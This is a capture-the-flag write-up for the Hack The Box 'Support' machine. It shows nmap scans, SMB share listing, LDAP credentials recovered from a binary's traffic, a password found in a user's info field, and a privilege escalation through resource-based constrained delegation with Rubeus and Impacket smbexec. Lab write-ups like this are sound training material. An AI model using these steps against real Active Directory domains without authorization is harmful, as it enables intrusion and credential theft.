Support - HTB - Key Points
October 12, 2022•1,092 words
Target IP: 10.10.11.174
nmap -sS -p- -T4 --min-rate=10000 10.10.11.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-12 09:18 CEST
Nmap scan report for 10.10.11.174
Host is up (0.11s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49674/tcp open unknown
49686/tcp open unknown
49700/tcp open unknown
51987/tcp open unknown
nmap -n -sV --script "ldap* and not brute" 10.10.11.174
dc,support,htb
smbclient -L \\10.10.11.174
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup availablesmbclient -N \\\\10.10.11.174\\support-tools
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 20 19:01:06 2022
.. D 0 Sat May 28 13:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 13:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 13:19:55 2022
putty.exe A 1273576 Sat May 28 13:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 13:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 19:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 13:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 13:19:43 2022
4026367 blocks of size 4096. 968536 blocks availableStrings analysis in Ghidra shows a username inside UserInfo.exe, Support\ldap
Tried launching the executable through wine and monitoring its network activity with Wireshark. Packet capture running the binary shows clear text credentials used for LDAP authentication:
support\ldap:nv...mz
We can further enumerate LDAP now.
ldapsearch -x -H ldap://dc.support.htb -D 'SUPPORT\ldap' -w 'nv...mz' -b "dc=support,dc=htb" "objectclass=user"
but more importantly
ldapsearch -x -H ldap://dc.support.htb -D 'SUPPORT\ldap' -w 'nv...mz' -b "dc=support,dc=htb" "objectclass=user" cn info
which shows a password contained in a user description:
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
cn: support
info: Ir...ul
This user has remote access privilege, we can use evil-winrm to access the box:
*Evil-WinRM* PS C:\Users\support\Documents> cat ..\Desktop\user.txt
65...d9
Run SharpHound on the box, analyze result on Bloodhound.
Support is a member of SHARED SUPPORT ACCOUNTS, which has Generic All on the dc. Checking the abuse section of bloodhound, we find out that having this sort of privilege on a computer object allows to perform an attack called "resource based constrained delegation".
A useful page from HackTricks helps in both understanding and performing the attack, follow the guide at this link.
The injection through Rubeus did not work for me, so I went a different route.
I exported the ticket and exfiltrated it to my Kali, where using ticket_converter.py I turned it from .kirbi to .ccache format.
With this new format we can use the ticket with Impacket's smbexec and achieve command execution as Administrator on the box.
C:\Windows\system32>type ..\..\Users\Administrator\Desktop\root.txt
59...43
Merry hacking ;)